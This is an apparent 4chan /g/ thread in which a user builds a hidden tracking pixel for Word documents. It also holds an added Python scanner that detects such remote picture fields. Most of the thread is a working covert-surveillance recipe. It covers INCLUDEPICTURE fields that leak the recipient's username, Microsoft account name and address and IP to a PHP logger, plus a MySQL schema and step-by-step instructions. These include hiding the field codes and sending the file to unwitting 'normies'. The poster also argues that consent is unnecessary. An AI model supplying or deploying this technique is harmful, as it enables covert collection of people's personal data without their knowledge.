Word document tracking

You are currently reading a thread in /g/ - Technology

Thread replies: 33
Thread images: 4
Hey /g/, i'm writing a report for my education and i would like to track who reads, edits, prints, etc. it.
i already made a kind of tracking pixel that's working and i'm able to embed it into the word file, i tested it and it contacts the server upon opening of the document.

Now i discovered that apart from INCLUDEPICTURE there are other word-fields like USERNAME and LASTSAVEDBY.
i should (not tested) be able to use these in the includepicture URL.
I'm looking into somehow escaping/encoding the strings so they don't trip up my server or the db.

I was wondering, how legal/ethical is this and how will normies perceive it when they catch my tracker (alt+F9)?

Hints and tips regarding development are appreciated, i will share the code along the way
Very unethical as they don't give permission to be tracked.

Also, why don't you use Google Docs or something, there you can see who views it etc?
I'm not tracking, i'm logging the requests to my webserver.
Information like last save date and username is metadata and by using microsoft office you are allowing documents to access that info.
I also host the images remotely to decrease file size on disk and in emails (most have 50mb inbox).

As far as permission goes, my document contains this text:


I think it should be their responsibility to disable auto-loading/interpreting of remote images, if they didn't disable it i see it as them making the request and not my document.
>b-b-but i can't disable it!
Well, you should've used a viewer that could.

No google docs because i need to submit it as a file and it needs to work offline.

Relax, it's only metadata, mostly.
I've seen this thread before AND all of the replies so far. Either you're samefagging hard or I'm dejavuing hard.
Bruh, i'm not samefagging.

I have not seen another thread about this, could you link me to some archive?

Did the other OP work out a POC and if yes, can i see it?
>Relax, it's only metadata, mostly.
>we kill people based on metadata
The NSA was only collecting metadata too.
>Errasse humanum est.

I know, that's why i said it.
>i've seen this thread before
>not providing link
this is why you should never trust doc/pdf/anything
aside from the tracking pixel, I don't understand how this works OP but it looks impressive
It includes a php page as a pic, the php page returns a picture.
it gives the $_GET variable to the php page which logs it into the DB.
The username in the URL *should* work like this but it doesn't.

Everything in a smaller fontsize is an example of the metadata i can log.

I'm stuck at using the {USERNAME} in the url, if i get past that i think i can do it.
Literally within 2 minutes of posting this i got past the {USERNAME} in the URL.

I really hope the viewer doesn't press ALT+F9, he knows some programming languages and will know what it is.
Hopefully word blocks ALT+F9 if the document is marked final, is protected against editing and has a digital signature.
MySQL Database structure.


-- table name taken from the INSERT statement in the PHP page
CREATE TABLE `tracker_data` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`ip_string` text COLLATE utf8_bin,
`ip_long` bigint(20) unsigned NOT NULL,
`last_saved_by` text COLLATE utf8_bin,
`print_date` text COLLATE utf8_bin,
`user_name` text COLLATE utf8_bin,
`user_address` text COLLATE utf8_bin,
`user_initials` text COLLATE utf8_bin,
`save_date` text COLLATE utf8_bin,
`rev_num` int(10) unsigned NOT NULL,
`edit_time` text COLLATE utf8_bin,
`author` text COLLATE utf8_bin,
`tag` text COLLATE utf8_bin,
PRIMARY KEY (`id`)
);
I realize no-one is lurking here, but i'll share anyway
Fucking bugs, forgot a ? in the query.
This is the fixed version:

$qr=$db->prepare('INSERT INTO `tracker_data` '.
'(`ip_string`,`ip_long`,`last_saved_by`,`print_date`,`user_name`,`user_address`,`user_initials`,`save_date`,`rev_num`,`edit_time`,`author`,`tag`) VALUES '.



header("Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate");
header("Expires: Wed, 11 Jan 2000 12:59:00 GMT");
//header("Last-Modified: Wed, 11 Jan 2006 12:59:00 GMT");
header("Pragma: no-cache");
header('Content-Type: image/png');
Honestly I might be tripping. But it seems like I read the same thing a month ago
You ARE tripping because i coded this today, or someone else also invented it before me
Post word document Source photo URL structure pls

Why text and not varchar(255)?
How to deploy:
>execute sql to create table >>52437446
>make php page using php code >>52437844
>upload your image to server
>in word, goto INSERT tab and select FIELD (in Quick Parts dropdown)
>select INCLUDEPICTURE and enter the plain URL to the php page
>check Data not stored in document, optionally check the resize options.
>hit OK
>if you don't see strange field codes like the image, press ALT+F9 (google the shortcut for non-windows)
>place cursor at end of .php and add a ?

add info
>at the end of the url, add l=
>place the cursor just after the =
>insert another field, this time use the lastsavedby field
>tune format settings and confirm insert dialog

>Repeat adding info for the following combinations:
l lastsavedby
p printdate
u username
a useraddress
i userinitials
s savedate
r revnum
e edittime
c author
t (instead of a field place identification tag)

>press ALT+F9 to hide the stuff.
>press CTRL+S
>press CTRL+W
>press CTRL+O and select the document
>goto image place (where you placed the include picture and all the stuff)
>if you see code, right click and select toggle field codes until all gone
>mark as final and digitally sign to prevent editing (and pray for word blocking ALT+F9 this way)
>send to normies
>get their IP's, username, microsoft account display name, microsoft account address (if set), ms account initials, and meta-data that show if they edited it after you.

YOU CANNOT TYPE THE STUFF OUT OF THE PIC, you need to manually add it field by field.
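
Seen from the recipient's side, the field structure built in the steps above can be found without opening the file in Word. The following is an added example, not code from the thread: it walks the field codes in a .docx and reports INCLUDEPICTURE fields with a remote target, together with the fields nested inside the URL. The sample document, the `tracker.example` host and all function names are constructed for illustration.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET  # for untrusted files prefer defusedxml's drop-in parser

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
REMOTE = re.compile(r'(?i)(https?://|\\\\)[^\s"]*')   # http(s) URL or UNC path

def find_remote_pictures(docx_bytes):
    """Return [(part, target, nested_field_names)] for remote INCLUDEPICTURE fields."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        parts = [p for p in z.namelist() if p.startswith("word/") and p.endswith(".xml")]
        return [(p, t, n) for p in parts for t, n in scan_part(z.read(p))]

def scan_part(xml_bytes):
    found, stack = [], []   # one stack frame per open complex field (fields can nest)
    def check(instr, nested):
        m = REMOTE.search(instr)
        if m and instr.split()[0].upper() == "INCLUDEPICTURE":
            found.append((m.group(0), nested))
    for el in ET.fromstring(xml_bytes).iter():
        kind = el.get(W + "fldCharType")
        if el.tag == W + "fldSimple":
            check(el.get(W + "instr", ""), [])
        elif el.tag == W + "instrText" and stack and not stack[-1]["result"]:
            stack[-1]["instr"] += el.text or ""
        elif kind == "begin":
            stack.append({"instr": "", "nested": [], "result": False})
        elif kind == "separate" and stack:
            stack[-1]["result"] = True   # what follows is the cached result, not field code
        elif kind == "end" and stack:
            f = stack.pop()
            if stack and not stack[-1]["result"]:   # this field sits inside another field's code
                stack[-1]["nested"] += [(f["instr"].split() or ["?"])[0].upper()] + f["nested"]
            check(f["instr"], f["nested"])
    return found

def sample_docx():   # constructed sample: picture URL embedding two nested fields
    run = lambda x: f"<w:r>{x}</w:r>"
    fc = lambda t: run(f'<w:fldChar w:fldCharType="{t}"/>')
    code = lambda s: run(f'<w:instrText xml:space="preserve">{s}</w:instrText>')
    inner = lambda name: fc("begin") + code(f" {name} ") + fc("separate") + run("<w:t>x</w:t>") + fc("end")
    body = (fc("begin") + code(' INCLUDEPICTURE "http://tracker.example/t.php?l=') + inner("LASTSAVEDBY")
            + code("&amp;u=") + inner("USERNAME") + code('" \\* MERGEFORMATINET \\d ') + fc("separate") + fc("end"))
    xml = f'<w:document xmlns:w="{W[1:-1]}"><w:body><w:p>{body}</w:p></w:body></w:document>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", xml)
    return buf.getvalue()

if __name__ == "__main__": print(find_remote_pictures(sample_docx()))
```

Headers, footers and other parts under `word/` are scanned as well, since a field can sit in any of them.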

see this post
i was too lazy to enter 255 in the length field and i don't know how long it can be
i forgot, after the very last \* in the stuff you need to put MERGEFORMATINET
OP here, can someone confirm this is working?
It works for me but idk if it does for others
I'll manufacture a word .docx for you, wait 20 mins
I've decided to redesign the entire thing, what i posted earlier still works (if you deploy it on your own server).
I'm done with redesign.
I've created a test document and i'm handing it to a normie to test.
>escaping strings
in php using sqlite3 db I escape strings this way
$username = SQLite3::escapeString($_GET['username']);

check php documentation to find out how to use it with mysqli
With mysqli you don't need to escape the strings if you use the bind_param() method.

bind_param() does not just insert the string into the query, it actually passes the string into the field in the table.
It's SQL-injection proof, i tried it.
Wanted to add this also:
If you teach yourself to use bind_param() all the time, you will never forget to escape the strings.
Pray that nobody from the EU opens your file because that kind of tracking was made illegal last year.
Good to know. Thanks, fαm!

I'm in the EU and everyone who has received a copy of my tracker is aware of the tracking and consented to it.
AFAIK this is subject to mandatory anoy-ifications that read "To provide you better bullshit we use cookies/trackers"
see 2. of the selected answer.

AFAIK this is THE way to do it, i always do it like this:

$data2=419>$data1?"Too high!":"All fine";
$query=$db->prepare('INSERT INTO `table1` (`field1`,`field2`) VALUES (?,?);');
return "u fulin now it bitch";

How do you make your queries?
shit, i meant 219<$data1
Thread DB ID: 424932
